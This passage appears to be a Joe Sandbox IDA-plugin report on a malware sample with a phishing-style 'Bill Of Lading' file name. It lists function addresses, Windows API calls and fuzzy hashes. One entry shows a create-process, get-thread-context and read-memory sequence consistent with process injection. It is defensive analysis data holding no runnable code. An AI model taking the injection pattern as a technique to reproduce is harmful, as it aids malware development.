                                                                                                                      • Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
                                                                                                                      • Opcode Fuzzy Hash: 27b28fb85d639681eb8fd2a3c2bcd9dc0bb82ef5f5c365fc5a47124cd6911170
                                                                                                                      • Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
                                                                                                                      APIs
                                                                                                                      • _malloc.LIBCMT ref: 00411734
                                                                                                                        • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                                                        • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                                                        • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                        • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
                                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1411284514-0
                                                                                                                      • Opcode ID: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                                                      • Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
                                                                                                                      • Opcode Fuzzy Hash: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                                                      • Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                      • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                                                                                                                      • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                      • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
                                                                                                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
                                                                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3677997916-0
                                                                                                                      • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                                      • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                                                                                                                      • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                                      • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                                                                                                                      APIs
                                                                                                                      • _malloc.LIBCMT ref: 00435278
                                                                                                                        • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                                                        • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                                                        • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                      • _malloc.LIBCMT ref: 00435288
                                                                                                                      • _malloc.LIBCMT ref: 00435298
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _malloc$AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 680241177-0
                                                                                                                      • Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                                                      • Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
                                                                                                                      • Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                                                      • Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
                                                                                                                      APIs
                                                                                                                      • _wcslen.LIBCMT ref: 00401B71
                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                        • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                        • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                        • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                      • String ID: @EXITCODE
                                                                                                                      • API String ID: 580348202-3436989551
                                                                                                                      • Opcode ID: 48d001a4b96ee351bc7679959485890c1c6d832d60c6cde5ea273d4c8ab31dfe
                                                                                                                      • Instruction ID: 288ad252d7dad0c090ff8240dee62855692e698d70424b42c0a66861a7771545
                                                                                                                      • Opcode Fuzzy Hash: 48d001a4b96ee351bc7679959485890c1c6d832d60c6cde5ea273d4c8ab31dfe
                                                                                                                      • Instruction Fuzzy Hash: 73F06DF2A002025BD7649B35DC0276776E4AB44704F18C83EE14AC7791F6BDE8829B15
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                                      • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                                                                                                                      • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                                      • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __lock_file_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 26237723-0
                                                                                                                      • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                                                      • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                                                                                                                      • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                                                      • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                        • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                      • __lock_file.LIBCMT ref: 00414EE4
                                                                                                                        • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                                                                                                                      • __fclose_nolock.LIBCMT ref: 00414EEE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 717694121-0
                                                                                                                      • Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                                                      • Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
                                                                                                                      • Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                                                      • Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 04021E63
                                                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04021EF9
                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04021F1B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1754566267.0000000004020000.00000040.00000020.00020000.00000000.sdmp, Offset: 04020000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4020000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2438371351-0
                                                                                                                      • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                                      • Instruction ID: 968394a7435154f5b5a6084f63864c3934e7fdd2b6ae6c101e109609fbf40d85
                                                                                                                      • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                                      • Instruction Fuzzy Hash: C912EE24E14668C6EB24DF60D8507DEB232EF68300F1090E9910DEB7A4E77A5F85CF5A
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ProtectVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 544645111-0
                                                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                      • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                                                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                      • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                                                                                                                      • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                                                                                                                      • Opcode Fuzzy Hash: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                                                                                                                      • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                                                                                                                      APIs
                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ProcWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 181713994-0
                                                                                                                      • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                                      • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                                                                                                      • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                                      • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                                                                                                      APIs
                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 10892065-0
                                                                                                                      • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                                                      • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                                                                                                                      • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                                                      • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3
                                                                                                                      • WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$PointerWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 539440098-0
                                                                                                                      • Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                                                      • Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
                                                                                                                      • Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                                                      • Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
                                                                                                                      APIs
                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ProcWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 181713994-0
                                                                                                                      • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                                      • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                                                                                                      • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                                      • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wfsopen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 197181222-0
                                                                                                                      • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                      • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                                                                                                                      • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                      • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                                                                                                                      APIs
                                                                                                                      • CloseHandle.KERNELBASE(00000000,?,0040DF8E), ref: 0040D91D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandle
                                                                                                                      • String ID:
